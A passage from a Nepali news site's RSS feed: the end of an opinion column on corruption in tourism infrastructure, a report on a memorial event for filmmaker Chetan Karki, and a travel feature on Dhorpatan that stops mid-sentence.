उद्घाटन गर्दा राजनीतिक प्रचार बढी हुन्छ । जब विकास प्रदर्शनमुखी हुन्छ, तब गुणस्तरभन्दा ठेक्का, कमिशन र उद्घाटन प्राथमिकतामा पर्छ । धेरै पर्यटन परियोजना विस्तृत सम्भाव्यता अध्ययन बिना सुरु गरिन्छन । कुनै ठाउँमा पर्यटक पुग्छन कि पुग्दैनन् वातावरणीय असर कस्तो पर्छ ? स्थानीय समुदायलाई लाभ हुन्छ कि हुँदैन ? दीर्घकालीन सञ्चालन कसरी हुन्छ ? यी आधारभूत प्रश्नको अध्ययन नगरी परियोजना घोषणा गरिन्छ । यसको मुख्य कारण योजना भन्दा बजेट निकाल्ने मानसिकता हो । अध्ययन कमजोर हुँदा लागत कृत्रिम रुपमा बढाइन्छ, डिजाइन फेरिन्छ, थप बजेट मागिन्छ र भ्रष्टाचारका नयाँ ढोका खुल्छन ।
योग्यता भन्दा राजनीतिक पहुँच, दलगत निकटता वा कमिसनका आधारमा निर्माण कम्पनी चयन गरिने प्रवृत्ति भ्रष्टाचारको जड :
नेपालमा कतिपय भ्यु टावर, पार्क वा पदमार्ग निर्माण भएर अलपत्र पर्नु यही समस्याको उदाहरण हो । पर्यटन पूर्वाधार निर्माणमा ठेक्कापट्टा प्रणाली अत्यन्त प्रभावशाली हुन्छ । धेरैजसो ठेकेदार कुनै न कुनै राजनीतिक शक्ति, कर्मचारी तन्त्र वा स्थानीय प्रभावशाली समूहसँग जोडिएका हुन्छन । यसले गर्दा योग्य कम्पनीभन्दा पहुँचवालाले ठेक्का पाउँछन । कम गुणस्तरको सामग्री प्रयोग हुन्छ, समयमै काम पूरा हुँदैन, लागत बारम्बार बढाइन्छ । कतिपय अवस्थामा एउटै समूहले योजना बनाउने, बजेट पार्ने, ठेक्का दिलाउने र अनुगमन गर्ने चक्र नै नियन्त्रण गर्छ । यस्तो अवस्थामा पारदर्शिता हराउँछ । अर्कोतर्फ पहुँचका आधारमा ठेक्का वितरण योग्यता भन्दा राजनीतिक पहुँच, दलगत निकटता वा कमिसनका आधारमा निर्माण कम्पनी चयन गरिने प्रवृत्ति व्यापक छ । यसले गुणस्तरीय प्रतिस्पर्धालाई कमजोर बनाएको छ । कतिपय ठाउँमा योजना कागजमा सम्पन्न देखाइन्छ तर स्थलगत रुपमा संरचना अधुरो हुन्छ । कतै सूचना बोर्ड मात्रै राखेर बजेट सकिएको उदाहरण समेत भेटिन्छन । धार्मिक तथा ऐतिहासिक सम्पदाको संरक्षणका लागि आएको रकम वास्तविक संरक्षणमा भन्दा दलाल, ठेकेदार र केही कर्मचारीको स्वार्थमा खर्च हुने गर्दछ । यसले सम्पदाको मौलिकता समेत नष्ट गरिरहेको छ । जुन कारणले पर्यटन पूर्वाधारको क्षेत्र भ्रष्टाचारको थलो बनेको छ ।
अहिले समाजमा कमिशन बिना काम हुँदैन भन्ने मानसिकता सामान्य बन्दै गएको छ । जब नागरिकले भ्रष्टाचारलाई असमान्य अपराध होइन, सिस्टम ठान्न थाल्छन, तब पर्यटन पूर्वाधारजस्ता क्षेत्रमा अनियमितता संस्थागत बन्छ । ठेकेदारले कमिशन दिनुपर्ने, नेताले हिस्सा खोज्ने, कर्मचारीले फाइल रोक्ने, स्थानीय समूहले भाग माग्ने यी सबैलाई सामान्य मान्ने प्रवृत्तिले विकासको नैतिकता कमजोर बनाएको छ । पर्यटन पूर्वाधारमा हुने भ्रष्टाचारले केवल पैसा नोक्सान मात्र होइन देशको भविष्यमा गहिरो असर पार्दछ । यसको परिणाम गुणस्तरहीन संरचना, दुर्घटना र जोखिम, पर्यटकको विश्वासमा कमी, प्राकृतिक सम्पदाको विनाश, स्थानीय समुदायको असन्तोष, राष्ट्रिय छविमा नकारात्मक असर पुग्दछ । पर्यटन पूर्वाधारमा बढी भ्रष्टाचार हुनुको मूल कारण कमजोर शासन, राजनीतिक हस्तक्षेप, पारदर्शिताको अभाव, स्थानीय सहभागिताको कमी र विकासलाई प्रदर्शनमा सीमित गर्ने मानसिकता हो । पर्यटन विकास भनेको केवल संरचना बनाउनु होइन यो संस्कृति, प्रकृति, स्थानीय जीवन र राष्ट्रिय पहिचानको संरक्षणसँग जोडिएको विषय हो । अब क्षेत्रमा भ्रष्टाचार नियन्त्रण गर्न सकिएन भने विकासका नाममा प्राकृतिक सम्पदा र सार्वजनिक धन दुवै नष्ट हुने खतरा रहन्छ ।
पूर्वाधारको विकासको योजनामा धार्मिक पर्यटनको भावनात्मक दोहन हुने गरेको छ । नेपालमा धार्मिक पर्यटन अत्यन्त संवेदनशील विषय हो । जनप्रतिनिधिले मन्दिर सौन्दर्यीकरणका नाममा अपारदर्शी खर्च गर्ने गरेका छन । मन्दिर, आश्रम, मूर्ति, धार्मिक पार्क, तीर्थमार्ग निर्माण आदिमा भावनात्मक समर्थन सजिलै पाइन्छ । धर्म जोडिएको विषय भएकाले नागरिकले धेरै प्रश्न उठाउन चाहदैनन् । यही मौनताको फाइदा उठाएर कतिपय पूर्वाधारमा लागत बढाइन्छ, अनियमितता लुकाइन्छ, सार्वजनिक जग्गा कब्जा गरिन्छ, निजी स्वार्थ मिसाइन्छ । धर्मको आडमा हुने भ्रष्टाचार झन खतरनाक हुन्छ । किनकि त्यसलाई प्रश्न गर्नु नै आस्था विरोध जस्तो बनाइन्छ । मूर्ति, गेट, धर्मशाला निर्माणमा कमिसन खाने, धार्मिक आस्थालाई चुनावी लाभसँग जोडने जस्ता प्रवृत्ति पनि धेरै ठाउँमा देखिन्छन । धार्मिक भावनाले प्रश्न कम उठने भएकाले यस्ता योजनामा पारदर्शिता झन कमजोर हुने गरेको छ । पूर्वाधारको क्षेत्रमा सामान्य ढुंगाको पर्खाललाई पर्यटन सौन्दर्यीकरण भनेर महँगो देखाइन्छ । कम गुणस्तरका सामग्री प्रयोग गरिन्छ । यस्तो अवस्थामा ठेकेदार, प्राविधिक र जनप्रतिनिधि बीच प्रतिशतमा भागबन्डा हुने गर्दछ । धेरै स्थानीय तहमा पूर्वाधारका योजना उपभोक्ता समितिमार्फत गराइन्छ । तर व्यवहारमा समिति जनप्रतिनिधिकै नजिकका मानिस हुने गर्दछन ।
विशेषतः पर्यटन पूर्वाधार निर्माण, संरक्षण र व्यवस्थापनका नाममा हुने गरेको अनियमितता अहिले गम्भीर बहसको विषय बनेको छ । पर्यटन क्षेत्रको अपार सम्भावनालाई लाभमा बदल्न व्यवसायी पनि निकै उत्साहित देखिएका छन । पर्यटन क्षेत्रको पूर्वाधारको नाममा केही सडक, कृत्रिम ताल पोखरी, मठ मन्दिरको मर्मत सम्भार र अन्य काम भएका पनि छन । तर, के ती निर्माण भएका काम गुणस्तरका छन त ? सडक निर्माण हुन नपाउँदै भत्किन शुरु हुन्छ । निर्माण भएका ताल पोखरीहरूमा तार जाली समेत छैन । प्रत्येक वर्ष मानिसको मृत्यु हुने गरेको छ । धेरै ठाउँमा बन्न लागेका पूर्वाधार निर्माण कार्य सम्पन्न नहँुदै अलपत्र अवस्थामा रहेका छन । यस्ता अनेकौं पर्यटनको क्षेत्रमा भएका पूर्वाधारका कामहरू छन । निर्माण भएका त्यस्ता कामहरूमा न त नागरिकहरूको चासो छ, न त विकास निर्माणको अनुगमन गर्ने निकायको !  जनअपेक्षा अनुरुप साँच्चिकै पर्यटन क्षेत्रको विकास भएको छ त ? कतिपय पूर्वाधारका योजनामा नियोजित भ्रष्टाचार हुने गरेको छ । यसलाई कारवाही गर्ने कसले ? सचेत नागरिकहरूले प्रश्न उठाउन थालेका छन । यसरी भ्रष्टाचार गर्दा कानुनीरुपमा हुनुपर्ने सम्पूर्ण कुराहरू कागजीरुपमा मिलाइएको हुन्छ । खासगरी यसरी भ्रष्टाचार गर्दा परिणाम र गुणस्तरजस्ता कुराहरूबाट कटौती गरी मोटो रकम भ्रष्टाचारको निम्ति छुटयाइएको हुन्छ ।
पर्यटन क्षेत्रको पूर्वाधार विकासमा देखिने भ्रष्टाचार कमिसनमा मात्र सीमित हुँदैन । धेरैजसो अवस्थामा यो नीतिगत भ्रष्टाचार का रुपमा देखा पर्दछ । जसले कानुन, नीति, बजेट र निर्णय प्रक्रियालाई नै केही सीमित समूहको स्वार्थअनुसार मोडने काम गर्छ । बाहिरबाट हेर्दा योजना वैधानिक र विकासमुखी देखिए पनि भित्रभित्रै निजी लाभ, राजनीतिक पहुँच र दलाल संयन्त्र हाबी हुन्छ । यही कारणले धेरै पर्यटन पूर्वाधारहरू निर्माण भए पनि तिनले अपेक्षित आर्थिक, सांस्कृतिक र सामाजिक प्रतिफल दिन सकेका छैन । नीतिगत भ्रष्टाचार भन्नाले नीति निर्माण, योजना छनोट, बजेट विनियोजन, ठेक्का प्रक्रिया र कार्यान्वयनका नियमहरूलाई निश्चित व्यक्ति, कम्पनी वा राजनीतिक समूहको हितमा प्रयोग गर्नु हो । यसमा प्रत्यक्ष रुपमा अवैध देखिने काम नहुन पनि सक्छ । तर निर्णय प्रक्रियाको मूल उद्देश्य सार्वजनिक हितभन्दा निजी लाभमा केन्द्रित हुन्छ । पर्यटन क्षेत्रमा यसको प्रभाव अझ गम्भीर हुन्छ । किनकि प्राकृतिक सम्पदा, धार्मिक स्थल, सांस्कृतिक सम्पदा र स्थानीय समुदायको जीवन प्रत्यक्ष जोडिएको हुन्छ । पर्यटन पूर्वाधारमा नीतिगत भ्रष्टाचार आवश्यकताभन्दा पहुँचका आधारमा योजना छनोट धेरै हुन्छ । पर्यटकको वास्तविक सम्भावना अध्ययन नगरी नेताको गृहक्षेत्र, कार्यकर्ताको दबाब वा व्यापारीको स्वार्थका आधारमा योजना बनाइन्छ । जहाँ सडक, खानेपानी वा स्वास्थ्य सेवा आवश्यक छ, त्यहाँ करोडौंको भ्यू टावर, पार्क, गेट वा मूर्तिस्थापना गरिन्छ ।
यसले पर्यटनभन्दा राजनीतिक प्रदर्शन बढी देखिन्छ । अध्ययनबिनै ठूला परियोजना घोषणा केबलकार, रिसोर्ट, होटल, विमानस्थल वा धार्मिक संरचना निर्माण गर्दा वातावरणीय प्रभाव, सांस्कृतिक असर र स्थानीय आवश्यकताको अध्ययन नगरी निर्णय गरिन्छ । पछि परियोजना अलपत्र पर्छ, लागत बढछ वा विवाद सिर्जना हुन्छ । धेरै पर्यटन पूर्वाधारका योजनाहरू घोषणामुखी विकासका उदाहरण बनेका छन । ठेक्का प्रणालीमा मिलेमतो गरी सीमित कम्पनीलाई फाइदा पुग्ने गरी मापदण्ड बन्ने गरेको छ । कहिलेकाहीँ एउटै समूहले विभिन्न नाममा प्रतिस्पर्धा गरेजस्तो देखाइन्छ । लागत कृत्रिम रुपमा बढाइन्छ र गुणस्तर घटाइन्छ । परिणामस्वरुप सडक केही वर्षमै बिग्रन्छ । पदमार्ग भत्किन्छ, पार्क प्रयोगविहीन हुन्छ भने भवन अधुरै रहन्छ । यस्ता उधारण धेरै हुन्छन । राष्ट्रिय स्रोतको दुरुपयोग पर्यटन विकासका लागि छुटयाइएको अबौं रकम दीर्घकालीन परिणाम नदिने संरचनामा खर्च हुन्छ । देश ऋणमा डुब्छ तर आम्दानी बढ्दैन । यसले विकास भएको जस्तो देखिने तर प्रतिफल नआउने अवस्था सिर्जना गर्छ । स्थानीय समुदायको विश्वास घटछ । जब स्थानीयले विकासमा पारदर्शिता देख्दैन उनीहरूमा सरकारप्रति अविश्वास बढछ । कतिपय अवस्थामा स्थानीय संस्कृति र भूमि बाह्य समूहको नियन्त्रणमा पुग्छ । यसले सामाजिक तनाव र असन्तोष बढाउन सक्छ । वातावरणीय क्षति अनियोजित सडक, होटल, केबलकार वा संरचनाले वन विनाश, पहिरो, प्रदूषण र जैविक विविधतामा असर पुर्याउछ । पर्यटन टिकाउ हुनुपर्ने ठाउँमा विनाशकारी बन्न थाल्छ । नीतिगत भ्रष्टाचारले प्रचारमुखी परियोजनालाई प्राथमिकता दिन्छ तर आधारभूत आवश्यकतालाई बेवास्ता गर्छ । उदाहरणका लागि दक्ष जनशक्ति, सरसफाइ, सुरक्षा, स्थानीय उत्पादन, सांस्कृतिक संरक्षण, यातायात व्यवस्थापन जस्ता विषय ओझेलमा पर्छन । यसले पर्यटनको दीर्घकालीन आधार कमजोर बनाउँछ ।
भ्रष्टाचार भन्नाले सार्वजनिक वा निजी जिम्मेवारी, पद, अधिकार, स्रोत वा विश्वासलाई व्यक्तिगत लाभ, समूहगत स्वार्थ वा अवैध फाइदाका लागि दुरुपयोग गर्नु हो । सामान्य भाषामा भन्नुपर्दा कानुन, नैतिकता र संस्थागत मर्यादाविपरीत गरिने अनुचित व्यवहार नै भ्रष्टाचार हो । यसले राज्य, समाज, अर्थतन्त्र र नैतिक संस्कारलाई कमजोर बनाउँछ । भ्रष्टाचार धेरै प्रकारका हुन्छन । कुनै काम गरिदिन, सुविधा उपलब्ध गराउन वा निर्णय आफ्नो पक्षमा पार्न पैसा वा उपहार लिनु–दिनु भ्रष्टाचार हो । पदको दुरुपयोग गरी कानुन विपरीत आफ्ना नजिकका व्यक्ति अर्थात नातावाद र कृपावाद योग्यता र क्षमता भन्दा पनि आफन्त, दलगत कार्यकर्ता वा चिनेजानेका व्यक्तिलाई अवसर दिनु भनेकै भ्रष्टाचार । सार्वजनिक सम्पत्तिको दुरुपयोग सरकारी गाडी, बजेट, सामग्री वा स्रोतलाई व्यक्तिगत प्रयोजनमा प्रयोग गर्नु पनि भ्रष्टाचार हो । विकास निर्माण, खरिद–बिक्री वा योजनामा अनियमितता गरेर रकम हिनामिना गर्नु र कानुन, नीति वा निर्णय नै सीमित व्यक्ति वा समूहलाई फाइदा पुग्ने गरी बनाइनु पनि भ्रष्टाचार हो । भ्रष्टाचार गर्नेले सजाय नपाउने वा राजनीतिक संरक्षण पाउने अवस्था सबैभन्दा खतरनाक हुन्छ । गरिबी र बेरोजगारी आर्थिक असुरक्षाले कतिपयलाई गलत बाटो रोज्न प्रेरित गर्छ । कमजोर प्रशासन नियमन, अनुगमन र पारदर्शिता कमजोर हुँदा भ्रष्टाचार मौलाउँछ ।
भ्रष्टाचारको नियन्त्रण तथा निवारण गर्ने काम अत्यन्तै जटिल र चुनौतीपूर्ण छ । सरकार र अन्य निकायहरू पनि यस कार्यमा खटेका छन । यसका लागि निरोधात्मक, उपचारात्मक र प्रवर्द्धनात्मक रणनीतिहरू तयार गरी कार्यान्वयन गरिएको छ । कानूनी रुपले त भ्रष्टाचारलाई अपराध नै मानिएको छ । नेपाल संयुक्त राष्ट्रसंघीय भ्रष्टाचार विरुद्धको महासन्धिको पक्षराष्ट्रसमेत रहेको छ । तर, नेपालले भ्रष्टाचार निवारणमा प्राप्त गरेको उपलब्धि सन्तोषजनक छैन । ट्रान्सपरेन्सी इन्टरनेशनलजस्ता भ्रष्टाचारका बारेमा अध्ययन अनुसन्धान गर्ने संस्थाले विगत डेढ दशकदेखि नेपालमा भ्रष्टाचार व्याप्त रहेको देखाएका छन । नीतिगत भ्रष्टाचार लगायत भ्रष्टाचारका नयाँ नयाँ स्वरुप र प्रकृतिहरू अगाडि आएका छन । यसले गर्दा सार्वजनिक सेवा प्रवाहमा अपेक्षित सुधार भएको छैन र सरकारप्रतिको नागरिक विश्वासमा पनि कमी हुदै आएको छ ।
(लेखक : लामो समयदेखि पत्रकारितामा सक्रीय रहनु भएका उहाँ लमजुङ जन्म थलो भई दाङलाई कर्मथलोका रुपमा रोज्नु भई नेपालको ग्रामीण पर्यटनका क्षेत्रमा विशेष दखल राख्दै कलम चलाउने गर्नु हुन्छ । – सं.)
]]>
https://www.antaranganews.com/?feed=rss2&p=48890 0
बहुप्रतीभाका धनी चेतन कार्कीको पाँचौं स्मृति दिवसमा विविध कार्यक्रम https://www.antaranganews.com/?p=48866 https://www.antaranganews.com/?p=48866#respond Mon, 18 May 2026 13:53:53 +0000 https://www.antaranganews.com/?p=48866 जावलाखेल(ललितपुर)– वरिष्ठ सर्जक एवम् चलचित्र निर्देशक चेतन कार्कीको पाँचौं स्मृति विविध कार्यक्रमका साथ मनाइएको छ । यहाँ स्थित चेतन कार्की स्मृति समाजले संस्थाको सचिवालय तथा कार्कीको निजी निवासमा जेठ २ गते स्मृति दिवस मनाएको हो ।
प्रमुख आमन्त्रित व्यक्तित्व साहित्यकार एवम् मुक्तककार उषा शेरचनको समुपस्थितिमा भएको कार्यक्रम संस्थाका अध्यक्ष मिथिला शर्माको सभापतित्वमा सम्पन्न भएको हो । प्रमुख आमन्त्रित व्यक्तित्व उषा शेरचनले चेतन कार्कीद्वारा लिखित नाटक ‘आत्मा बेचेको छैन’को रिहलसल सानैमा लुकीलुकी हेरेको सम्झना गर्नु भयो । आफूले उहाँलाई दाइ भन्ने गरेकोमा ‘काका’ भन्नु पर्ने भनेर चेतन कार्कीले जिकिर गर्नु भएको स्मरण गर्नु भएको थियो ।
संस्थाका संरक्षक चेतन कार्कीको धर्मपत्नी श्रीमती गंगा कार्कीले चेतन कार्कीलाई विवाहपूर्व नै चिनेको र उहाँले आफूलाई देहरादूनमा विज्ञान पढाएको र पछि गुह्येश्वरीमा विवाह भएको संस्मरण गर्नु भएको थियो ।
यसैगरी, गायक डा किरण प्रधानले चेतन कार्कीसँग फिल्मी गीत र प्रहरीको लागि गीत गाउँदा सहकार्यको संस्मरण गर्नु भयो । फिल्म मायाप्रीतिको चोखो कथाको गीत मान्छे चढ्यो जूनमा कहिल्यै मदिरा नपिउने किरणले मदिरा पिएको कलाकारले लागि गीत गाउँनु चुनौती थियो । पहिला दाइले विश्वास गर्नु भएन । मैले गीत गाए राम्रो भयो अनि भाइ ‘भूइं नछोड्नु’ भनेको संस्मरण गर्नु भयो ।
पूर्व प्रशासक एवम् साहित्यकार खगराज बरालले आफू सानै हुँदा चेतन कार्कीले आफूलाई पढ्न लेख्न प्रेरित गरेको र प्रशासन सम्हाल्दा साहित्यमा रुचि भएको बेला मामा चेतन कार्कीसँग सल्लाह गरि पुस्तक प्रकाश गरेको र केही पुस्तकमा आशिर्वचन लिएको संस्मरण गर्नु भयो ।
चेतन कार्कीका भान्जा इन्जिनियर रामबहादुर कार्कीले मामाले पढ्न प्रेरित गरेको र पोखरामा भेट भएका दिनहरू संस्मरण गर्दै असाधारण व्यक्ति भएको र उहाँको जन्म गाउँ स्याङ्जा फेदीखोलामा उहाँको जीवनी पाठ्यसामग्रीमा समावेश गरिएको जानकारी दिनु भयो ।
गीतकार एवम् समाजको कार्यसमिति सदस्य सुबासचन्द्र ढुंगेलले पिताजी नामले सम्बोधन गरिने चेतन कार्कीसँग पोखरा, हेटौंडा र देहरादून गएका दिनहरूको संस्मरण गर्दै उहाँका प्रमुख विशेषता बुँदामा प्रस्तुत गर्नु भएको थियो ।
यसैगरी, गायक दिवाकर खड्काले उतिबेलाको जावलाखेल र चेतन कार्कीको प्रसंगको संस्मरण गर्नु भयो । साहित्यकार भक्तबहादुर पण्डितले उहाँको छिमेकी भएकोमा गर्व गर्दै उहाँले धेरै मायासहित गाली नोकझोक भएकोसमेत संस्मरण गर्नु भयो ।
चेतन कार्कीको कनिष्ठपुत्र पंकज कार्की आफ्ना बुबा चेतन कार्कीलाई बुबा कै रूपमा देखेको भनाइ राखेर बुबालाई सम्झिएर लेखिएको कविता वाचन गर्नु भएको थियो ।
समाजका कार्यसमिति सदस्य, साहित्यकार एवम् साहित्यिक पत्रकार संघका अध्यक्ष राधेश्याम लेखालीले आफूले चेतन कार्कीलाई ‘चेतन चाचा’ भन्ने गरेको मुक्तकका मानक तयार गर्न सल्लाह लिएको र दिल्ली हुँदै देहरादून पुगेको साहित्यिक टोलीलाई गोर्खाली सुधार सभामा सभा सहित चेतन चाचाले सम्मान गर्नु भएको भुल्न नसकिने बताउनु भयो । उहाँले चेतन कार्कीको प्रसिद्ध मुक्तक ‘रुप होस् अभिमान नहोस् सम्भव नै छैन ……… , वाचन गर्नु भएको थियो ।
संस्थाका अध्यक्ष कलाकार मिथिला शर्माले सानैदेखि कला कर्ममा डोर्याउने चेतन कार्की आफ्नो गुरु भएको बताउनु भयो । गुरुको सम्मानमा पुरस्कार स्थापना गरेको र चेतन कार्कीलाई चेतन कार्की बनाउन प्रमुख भूमिका निर्वाह गर्नु हुने छाँया शक्ति भाउजू गंगा कार्कीको सम्मान गरिएको बताउनु भयो ।
साहित्यकार दिव्य गिरीले १५ वर्ष अगाडि मुक्तकको भूमिका लेख्न आउँदा परिचय भएको र त्यतिबेला देखि अत्यन्तै नजिक रहेर काम गर्दै आएको संस्मरण गर्नु भयो ।
गायिका गीता पाण्डे र गायिका रितु कँडेलले चेतन कार्कीद्वारा रचित कालजयी गीत बिनाबाजा गाउनु भएको थियो ।
समाजका महासचिव मुरारि सिग्देलले चेतन कार्कीकोसँग बिताएका दिनहरू सम्झदै उहाँको समयप्रति सचेत, अनुशासन, आत्मा नबेच्ने निष्ठा भएको सर्जकको निधन असामयिक भएको बताउँदै कार्यक्रम सञ्चालन गर्नु भएको थियो ।

]]>
https://www.antaranganews.com/?feed=rss2&p=48866 0
ढोरपाटन : ग्रामीण पर्यटन र भू–स्वर्गको अनुभूति https://www.antaranganews.com/?p=48797 https://www.antaranganews.com/?p=48797#respond Sat, 16 May 2026 11:19:34 +0000 https://www.antaranganews.com/?p=48797 पर्यटनका लागि ढोरपाटन प्राकृतिक सौन्दर्य, विशाल उपत्यका, हरियाली पहाड, दुर्लभ वन्यजन्तु र शान्त वातावरणले भरिएको अनुपम गन्तव्य हो । ढोेरपाटनको बुकी पाटन पुग्ने पर्यटकहरूले बादलमाथि उभिएजस्तो अनुभूति गर्छन । हिमश्रृखलाको मनोरम दृश्य, स्वच्छ हावा र धुपिसल्ला र रंगीबिरंगी गुराँस र बुकी फूलले ढाकिएका सुन्दर डाँडाकाँडाले ढोरपाटन साँच्चिकै भू–स्वर्गको अनुभूति हुन्छ । पहिलो पटक ढोरपाटन पुग्ने पर्यटकहरूलाई भूस्वर्गको आनन्द, शान्ति, सौन्दर्य र सुखको अनुभूति हुन्छ । ढोरपाटन पुगेपछि पर्यटकको सबै थकान प्राकृतिक मनोरम दृश्यले नै मेटाइदिन्छ ।
बाग्लुङ, म्याग्दी र पुर्वी रुकुमको संगमस्थल ढोरपाटन पर्यटनका लागि प्रकृति, संस्कृति, शिकार आरक्ष, हिमाली जीवनशैली र साहसिक पदयात्रा एउटै थलोमा भेटिन्छन । नेपालका अन्य चर्चित पर्यटकीय गन्तव्यहरू जस्तै पोखरा, मुस्ताङ वा रारा जति प्रचारप्रसार नपाए पनि ढोरपाटन आफ्नो मौलिक सौन्दर्य र प्राकृतिक वैभवका कारण पछिल्ला वर्षहरूमा आन्तरिक तथा बाह्य पर्यटकको आकर्षणको केन्द्र बन्दै गएको छ । हिमालको काखमा फैलिएको विशाल फाँट, नीलो आकाश, बुकी फूलले ढाकिएका लेक, जंगली जनावरको संसार र मगर संस्कृतिले ढोरपाटनलाई अद्वितीय बनाएको छ । ढोरपाटन शब्द दुई शब्द मिलेर बनेको छ ढोर र पाटन । ढोर भनेको लेक र पाटन भनेको फराकिलो घाँसे मैदान हो ।  ढोरपाटन प्राकृतिक सौन्दर्य, हरियाली, हिमाल, ताल–तलैया, नदी, शीतल वातावरण, सांस्कृतिक वैभव वा आध्यात्मिक महत्वले भरिपूर्ण पर्यटनको क्षेत्र हो । प्राकृतिक दृष्टिले  ढोरपाटनलाई भूस्वर्गको उपमा समेत पर्यटकहरूले दिने गर्दछन । ढोरपाटनमा पर्यटकहरूलाई भौतिक सुन्दरता मात्र होइन, आत्मिक आनन्द, शान्ति र दिव्य अनुभूति हुन्छ ।
ढोरपाटनको अर्को नाम हो बादलमुनीको गाँउ । वरीपरी हिमाली दृष्य हिमालको काखमा राता डाँडा त्यसमुनी हरीयो जंगल, जंगल मुनी मैदानी भाग अनि बस्ति र स्वच्छ कञ्चन नदीको प्राकृतिक उत्तम उपहार हो ढोरपाटन । प्रकृति प्रेमी पर्यटकहरूका लागि ढोरपाटन खुला विश्वविद्यालय पनि हो । इतिहास खोज्ने हो भने ढोरपाटन मगर समुदायको आदिम बसोबास क्षेत्र हो । यहाँको जीवनशैली, भाषा, लोकसंस्कृति र पर्वहरूमा मगर सभ्यताको प्रभाव पाइन्छ । ढोरपाटन क्षेत्र मगर समुदायको सांस्कृतिक केन्द्रका रुपमा पनि परिचित छ । यहाँका गाउँहरूमा अझै परम्परागत जीवनशैली जीवित छ । ढोरपाटनको पुराना गाउँमा भुजि, कागं, दिजा, मस र निसेलढोर हो । तर अहिले ढोरपाटनमा पाखाथर, विजौरी खोला, खाल्टाखुल्टी, दुवाल, चिसापानी, स्यालपाखे, सुकुरदुङ, ठूलो मसुरी, र सुप्राङ गाउँहरू थपिएका छन । अहिले पनि निसीभुजी र तमान क्षेत्रमा मगर, थकाली र छन्त्यालको घना बस्तीमा भेडाको ऊन, भांगो र पुवा अल्लोको धागोबाट कपडा बुन्ने चलन जीवितै छ । त्यही धागोबाट उत्पादित भांग्रा, कछाड, हर्दुला, घुम काम्लो, राडी पाखीलाई प्रयोग गर्ने प्रचलन छ ।
पर्यटकहरूमा ढोरपाटन पुगेपछि के–के अवलोकन गर्ने ? कुन–कुन ठाउँमा पुग्ने ? ढोरपाटन पुगेपछि पुग्नै पर्ने ठाउँ कुन हो ? आदि कुराहरूको पूर्व योजना बनेको हँुदैन । ढोरपाटन पुग्दैमा सबै कुराको अध्ययन अवलोकन गर्न सकिन्न । ढोरपाटनमा हिउँद समयमा तापक्रम न्यून रहने र जोडसँग चिसो हावा चल्ने गर्दछ । बिहानीपख बादल र कुहिरोले ढाकिरहन्छ । तर पछि हावा चलेर बादल हटेपछि मौसम सफा हुने गर्दछ । माघ र फागुन महिनातिर ढोरपाटनमा तल्लो भेगसम्म नै हिउँ पर्ने गर्दछ । तर तल्लो भेगको हिउँ चाँडै पग्लेर जान्छ । ढोरपाटनमा मौसम पनि बडो बिचित्रको हुन्छ । क्षणभरमा नै आकाश खुल्ने र छिनभरमै बादलले ढाकिदिन्छ । ढोरपाटनमा हरेक याममा फरक– फरक ऋतुमा पुग्ने हो भने हरेक पटक पर्यटकहरूले फरक अनुभव गर्न सक्दछन । ढोरपाटन छिर्ने नाका देउराली डाँडामा नाउर र झारलको स्तम्भ छ । त्यहाँबाट तलतिर हेर्दा मनोरम समथर ढोरपाटन देखिन्छ । ढोरपाटन पुगेपछि सुन्दर पाटन, आकर्षक गाउँ, मनै लोभ्याउने हिमाल, पृथक रहनसहन, परम्परागत रुपमा बनेका घर–गोठहरू र घोडचडीले पर्यटकको मन लोभ्याउँछ । त्यसका साथै गुर्जाघाट, जलजला र माथिल्लो भागमा बुकीलगायतका बस्ती ढोरपाटनका अन्य रमणीय स्थान हुन ।
ढोरपाटनमा उत्तरगंगाको ढोरबराह मन्दिर, उत्तरगंगा, रुद्रताल, छेन्टुङ गुम्बालगायत मठमन्दिर रहेका छन । जनैपूर्णिमा, शिवरात्रिलगायत विभिन्न पर्वमा यहाँ तीर्थालुको भिड लाग्छ । ढोरपाटन आरक्ष कार्यालयको तीन किलोमिटर पूर्वमा रहेको छेन्टुङ गुम्बा र तिब्बती बस्ती ढोरपाटनको अर्को आकर्षण हो । वसन्त ऋतुमा ढोरपाटन उपत्यकाको डाँडाकाँडाहरू रंगीबिरंगी गुराँस र बुकी फूलले सजिन्छन । वर्षायाममा हरियालीले भरिपूर्ण हुन्छ भने हिउँदमा सेताम्मे हिमपातले ढोरपाटन क्षेत्रलाई झनै आकर्षक बनाउँछ । ढोरपाटन केवल प्राकृतिक दृश्य हेर्ने ठाउँ मात्र होइन, यो साहसिक पदयात्राका लागि पनि उत्कृष्ट गन्तव्य हो । ढोरपाटन क्षेत्रमा पदयात्रा गर्दा पर्यटकहरूले मगर गाउँ, लेकाली संस्कृति, गोठको जीवन, भेडाबाख्रा र गाई भैंसीको गोठ नजिकबाट अनुभव गर्न सक्छन । ढोरपाटनमा पर्यटकको पहिलो रोजाइ आरक्ष कार्यालयमा रहेको सूचना केन्द्र र संग्रहालयमा हुन्छ । संग्रहालय बिदाको दिन तथा बिहान र साँझमा पनि खुला रहन्छ । संग्रहालयमा आरक्ष क्षेत्रमा पाइने वन्यजन्तुबारे जानकारीसहित विभिन्न जनावर र पशुपन्छीको छालासमेत राखिएको छ ।
पर्यटकहरूको बुझाइ ढोरपाटन भन्ने बित्तीकै शिकार आरक्ष भन्ने हुन्छ । हुन पनि हो बिदेशी पर्यटकहरू ढोरपाटनमा शिकार खेल्नको लागि पुग्ने गर्दछन । ढोरपाटन शिकार आरक्ष क्षेत्रलाई ७ वटा ब्लकमा बाँडिएको छ । ढोरपाटन क्षेत्रमा फागुने, सुर्तिबाङ, बासै, धुस्वुङ, सेङ्ग, दोगाडी र सुनदह नामका शिकार आरक्षका ब्लकहरू रहेका छन् । ढोरपाटनको उत्तरी सीमामा पुथा, चुरेन र गुर्जा हिमालहरू पर्दछ । शिकार आरक्ष म्याग्दीको गुर्जाघाटदेखि बाग्लुङको निसेलढोर र रुकुमको सुनदहसम्म फैलिएको छ । भौगोलिक हिसाबले आरक्षको पूर्व दारेखानी, झाल्के र लामाभन्ज्याङका धुरी पर्दछ । भने पश्चिमतर्फ खरिवाङखोला, कुल्टा भन्ज्याङ र जक्ला भन्ज्याङ पर्दछ । त्यसैगरी दक्षिणपट्टि सुर्तिवाङ र उत्तरगंगा पर्दछ । ढोरपाटन शिकार आरक्षको कार्यालय बाग्लुङको बोबाङमा पर्दछ भने शाखा कार्यालयहरू गुर्जाघाट, गुर्जाखानी, निसेलढोर, तकमेरा र मैकोटमा रहेका छन् । यी सबै ब्लक घुम्नका लागि पर्यटकले कम्तिमा सात दिनसम्म ढोरपाटन क्षेत्रमा बस्नु पर्दछ । पर्यटकहरूले यात्राको सात दिनको 